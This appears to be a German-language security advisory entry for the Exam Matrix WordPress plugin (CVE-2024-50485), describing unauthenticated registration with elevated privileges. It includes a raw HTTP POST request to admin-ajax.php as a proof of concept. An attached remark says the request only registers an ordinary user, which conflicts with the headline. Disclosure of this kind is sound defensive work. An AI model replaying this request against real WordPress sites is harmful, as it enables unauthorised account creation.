
Exam Matrix <= 1.5 - Unauthentifizierte Privilegieneskalation
Exam Matrix <= 1.5 - Nicht authentifizierte Privilegienausweitung
Das Exam Matrix Plugin für WordPress ist anfällig für Privilegienausweitung in allen Versionen bis einschließlich 1.5. Dies liegt daran, dass das Plugin die Funktionalität nicht ordnungsgemäß einschränkt, sodass nicht authentifizierte Benutzer sich als eine höher privilegierte Rolle registrieren können. Dadurch ist es nicht authentifizierten Angreifern möglich, höhere Zugriffsrechte wie administrative Rechte zu erlangen.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50485
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: exam-matrix
Dies ermöglicht nur die Registrierung als Benutzer, es gibt keine Option, die Rolle zu ändern.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 133
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=register_action&username=admin2&[email protected]&firname=John&lasname=Doe&address=123%20Main%20St&passwrd=securepassword
goToImageUpload